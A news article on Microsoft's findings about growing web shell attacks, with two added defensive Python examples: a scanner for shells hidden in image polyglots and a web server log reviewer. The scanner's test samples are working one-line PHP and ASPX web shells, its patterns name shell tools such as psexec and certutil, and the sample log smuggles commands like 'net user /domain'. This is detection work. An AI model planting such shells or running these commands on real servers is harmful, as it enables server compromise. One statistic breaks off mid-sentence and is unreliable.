Microsoft security personnel are seeing a big increase in the use of web shells, the lightweight programs that hackers install so they can dig deeper into compromised websites.
The average number of web shells installed from August 2020 to January this year was 1
A Swiss Army knife for hackers
The growth reflects how useful these simple programs are, and how hard they can be to discover. A web shell is an interface that lets hackers run standard commands on a web server once the server has been compromised. Web shells are written in web programming languages such as PHP, JSP or ASP, and the command interface is reached through the same HTTP requests a browser makes to any other page.
Once successfully installed, web shells allow remote hackers to do most of the same things that legitimate administrators can do. Hackers can use them to execute commands that steal data, run malicious code, and return system information that lets them move further into a compromised network. The programs can also provide a persistent backdoor which, despite its effectiveness, remains surprisingly difficult to detect.
In a blog post published Thursday, members of the Microsoft Detection and Response Team (DART) and the Microsoft 365 Defender Research Team wrote:
Once installed on a server, web shells serve as one of the most effective means of persistence in an enterprise. We often see cases where web shells are used solely as a persistence mechanism. Web shells guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left undetected, web shells provide a way for attackers to continue to gather data from and monetize the networks they have access to.
Compromise recovery cannot be successful and lasting without locating and removing attackers’ persistence mechanisms. And while rebuilding a single compromised system is a great solution, restoring existing assets is the only feasible option for many. So, finding and removing all backdoors is a critical aspect of compromise recovery.
In early July last year, the Metasploit hacking framework added a module that exploited a critical vulnerability in F5’s BIG-IP Application Delivery Controller, a device that typically sits between a perimeter firewall and a web application to handle load balancing and other tasks. A day later, Microsoft researchers began to see hackers using the exploit to install web shells on vulnerable servers.
Initially, hackers used the shells to install malware that hijacked the servers’ computing power to mine cryptocurrency. Less than a week later, researchers saw hackers exploiting the BIG-IP vulnerability to install web shells for a much wider range of purposes on servers belonging to both the US government and private industry.
In another case from last year, Microsoft said it was conducting an incident response after a public sector organization discovered that hackers had installed a web shell on one of its Internet-facing servers. The hackers had “uploaded a web shell in multiple folders on the web server, which led to the subsequent compromise of service accounts and domain admin accounts,” Microsoft researchers wrote. “This allowed the attackers to perform reconnaissance using net.exe, scan for additional target systems using nbtstat.exe, and eventually move laterally using PsExec.”
The hackers went on to install a backdoor on an Outlook server that intercepted all incoming and outgoing emails, performed further reconnaissance and downloaded other malicious payloads. Among other things, the backdoor let the hackers send specially crafted emails that it interpreted as commands.
Needle in a haystack
Because they are written in common web development languages, web shells can be difficult to detect. Adding to the difficulty, web shells have several ways to receive and execute commands. Attackers can hide commands inside user agent strings and parameters that are sent during an exchange between the attacker and the compromised site. As if that were not enough, web shells can be stashed inside media files or other non-executable file formats.
“When this file is loaded and analyzed on a workstation, the image is harmless,” Microsoft researchers wrote. “But when a web browser asks a server for this file, malicious code executes server side. These challenges in detecting web shells contribute to their increasing popularity as an attack tool.”
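The polyglot trick the researchers describe, an image that is harmless on a workstation but runs as a script on the server, can be hunted for on disk. The Python scanner below is an added example written for this article; it is not Microsoft’s detection logic or the NSA’s tooling. The regular expressions, the magic-byte list, the extension lists and the five sample files are constructed for the demonstration and would need tuning to a real web root.

```python
"""Scan web content for web shells, including shells hidden inside files that
present themselves as images. Added illustration only; this is not Microsoft's
or the NSA's tooling, and the sample files below are constructed for the demo."""
from __future__ import annotations
import re
from pathlib import Path

# Server-side script openers (PHP, ASP/ASPX, JSP) that have no business inside a media file.
SCRIPT_TAGS = re.compile(rb"<\?php|<\?=|<%[@!=]?|<script[^>]*runat\s*=\s*[\"']?server", re.I)
# Execution primitives a shell wires to attacker input.
EXEC_FUNCS = re.compile(
    rb"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open|create_function|"
    rb"Runtime\.getRuntime|Process\.Start|ProcessStartInfo|WScript\.Shell)\b", re.I)
# Ways a script reads request data: the "command channel" of a web shell.
REQUEST_INPUT = re.compile(
    rb"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b|Request\.(Form|QueryString|Item|Headers)|"
    rb"request\.getParameter", re.I)
# Decoders used to hide the payload from simple string matching.
OBFUSCATION = re.compile(rb"base64_decode|gzinflate|gzuncompress|str_rot13|FromBase64String", re.I)

IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
SCRIPT_EXT = {".php", ".phtml", ".php5", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}


def scan_bytes(name: str, data: bytes) -> list[str]:
    """Return the reasons the file `name` with contents `data` looks like a web shell
    (an empty list means nothing was found)."""
    reasons: list[str] = []
    ext = Path(name).suffix.lower()
    has_script = SCRIPT_TAGS.search(data) is not None
    if has_script and data.startswith(IMAGE_MAGIC):
        reasons.append("server-side script tag embedded in an image file")
    elif has_script and ext not in SCRIPT_EXT:
        reasons.append(f"server-side script tag in non-script file type {ext or '(no extension)'}")
    if EXEC_FUNCS.search(data) and REQUEST_INPUT.search(data):
        reasons.append("execution primitive fed by request parameters")
    if EXEC_FUNCS.search(data) and OBFUSCATION.search(data):
        reasons.append("obfuscated payload passed to an execution primitive")
    return reasons


def scan_tree(root: str | Path, max_bytes: int = 4 * 1024 * 1024) -> dict[str, list[str]]:
    """Walk a web root and report every file scan_bytes flags. Files above
    max_bytes are skipped so a media library does not stall the scan."""
    findings: dict[str, list[str]] = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.stat().st_size <= max_bytes:
            reasons = scan_bytes(path.name, path.read_bytes())
            if reasons:
                findings[str(path)] = reasons
    return findings


# Constructed sample files for the demonstration (not real artifacts).
SAMPLES = {
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,  # benign image
    "index.php": b"<?php echo htmlspecialchars($_GET['q']); ?>",  # benign: reads input, runs nothing
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"<?php @eval($_POST['c']); ?>",  # image polyglot shell
    "cache.txt": b"<?php system(base64_decode($_REQUEST['x'])); ?>",  # shell behind a harmless extension
    "help.aspx": b'<%@ Page Language="C#" %><% System.Diagnostics.Process.Start(Request.Form["c"]); %>',
}


def demo() -> dict[str, list[str]]:
    """Run the scanner over the constructed samples and return only the flagged ones."""
    return {name: r for name, data in SAMPLES.items() if (r := scan_bytes(name, data))}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {'; '.join(reasons)}")
```

The scanner flags the three things the article describes: a script opener inside a file whose leading bytes say it is an image, an execution primitive wired to request input (the command channel of a web shell), and a decoder such as base64_decode sitting in front of that primitive. A plain index.php that echoes a request parameter without executing anything is not flagged, which is the false-positive case a scanner like this most needs to get right; a real deployment would also compare the flagged paths against what was actually deployed, since a shell dropped into a legitimate .aspx file is indistinguishable from application code by extension alone.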
Thursday’s post lists a number of steps administrators can take to keep web shells off a server. They include:
- Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these vulnerabilities. Deploy the latest security updates as soon as they become available.
- Implement proper segmentation of your perimeter network so that a compromised web server does not lead to the compromise of the enterprise network.
- Enable antivirus protection on web servers. Turn on cloud-delivered protection to get the latest defenses against new and emerging threats. Users should only be able to upload files to directories that can be scanned by antivirus and that are configured to disallow server-side scripting or execution.
- Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the Internet.
- Use Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement as well as other attack activities.
- Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
- Practice good credential hygiene. Limit the use of accounts with local or domain admin privileges.
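Several of these recommendations come together in log review: commands carried in user agent strings or request parameters, as the article describes, and scripts being served out of an upload directory that should not allow server-side execution. The following is an added Python example, not Microsoft’s or the NSA’s tooling; the combined-format log lines, the upload directory names, the extension lists and the command token list are constructed assumptions for the demonstration.

```python
"""Review web server access logs for signs of a web shell being driven:
commands tucked into query strings or User-Agent headers, empty User-Agents,
and requests that execute scripts from an upload directory. Added illustration;
not Microsoft's or the NSA's tooling. The log lines are constructed for the demo."""
from __future__ import annotations
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" log format.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Tokens a browser never emits on its own but an operator typing into a shell does.
# Tune this list to the applications on the server; it is an illustrative starting point.
SHELLISH = re.compile(
    r"(?i)(?:^|[^a-z])(whoami|cmd(?:\.exe)?|powershell|net\s+(?:user|group|view)|nbtstat|"
    r"psexec|certutil|ipconfig|/bin/sh|bash\s+-c)(?![a-z])"
)
UPLOAD_DIRS = ("/uploads/", "/upload/", "/files/", "/media/")   # assumed layout
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp", ".jspx")
STATIC_EXT = (".jpg", ".jpeg", ".png", ".gif", ".ico", ".css", ".txt")


def classify(rec: dict[str, str]) -> list[str]:
    """Return the reasons one parsed request looks like web shell traffic."""
    reasons: list[str] = []
    url = urlsplit(rec["target"])
    path = url.path.lower()
    query = unquote(url.query)
    ua = rec["ua"]
    if SHELLISH.search(query):
        reasons.append("command in query string")
    if SHELLISH.search(ua):
        reasons.append("command in User-Agent")
    if ua in ("", "-"):
        reasons.append("empty User-Agent")
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXT):
        reasons.append("script executed from an upload directory")
    if path.endswith(STATIC_EXT) and rec["method"] == "POST":
        reasons.append("POST to a static media file")
    return reasons


def analyze(log_text: str) -> list[dict]:
    """Parse combined-format lines and return the flagged requests with their line numbers."""
    findings: list[dict] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE.match(line)
        if not m:
            continue  # unparseable line: worth its own alert in production, skipped here
        rec = m.groupdict()
        reasons = classify(rec)
        if reasons:
            findings.append({"line": n, "ip": rec["ip"], "target": rec["target"], "reasons": reasons})
    return findings


def by_source(findings: list[dict]) -> Counter:
    """Count flagged requests per client address; the operator's IP floats to the top."""
    return Counter(f["ip"] for f in findings)


# Constructed sample log (not a real capture): two ordinary requests, then an
# operator probing a polyglot image and driving a shell dropped under /uploads/.
LOG = """\
203.0.113.7 - - [12/Feb/2021:10:01:03 +0000] "GET /images/banner.png HTTP/1.1" 200 5120 "https://example.test/" "Mozilla/5.0 (Windows NT 10.0) Firefox/85.0"
203.0.113.7 - - [12/Feb/2021:10:01:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "https://example.test/" "Mozilla/5.0 (Windows NT 10.0) Firefox/85.0"
198.51.100.23 - - [12/Feb/2021:10:02:11 +0000] "GET /uploads/photo.jpg?c=whoami HTTP/1.1" 200 57 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Feb/2021:10:02:40 +0000] "POST /uploads/avatars/help.aspx HTTP/1.1" 200 812 "-" "-"
198.51.100.23 - - [12/Feb/2021:10:03:05 +0000] "GET /uploads/avatars/help.aspx HTTP/1.1" 200 812 "-" "cmd=net user /domain"
"""

if __name__ == "__main__":
    hits = analyze(LOG)
    for f in hits:
        print(f"line {f['line']} {f['ip']} {f['target']}: {'; '.join(f['reasons'])}")
    print("flagged requests per source:", dict(by_source(hits)))
```

The two browser requests pass untouched; the three from the second address are flagged for a command in the query string, an empty User-Agent on a POST to a script under the upload directory, and a command smuggled in the User-Agent. Counting hits per source is what turns individual odd lines into the operator’s address. Note what a log alone cannot tell you: whether a .jpg that answers a query actually ran code, which is why the article’s advice to keep upload directories free of server-side execution matters more than any detection rule.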
The National Security Agency has published tools that help administrators detect and remove web shells on their networks.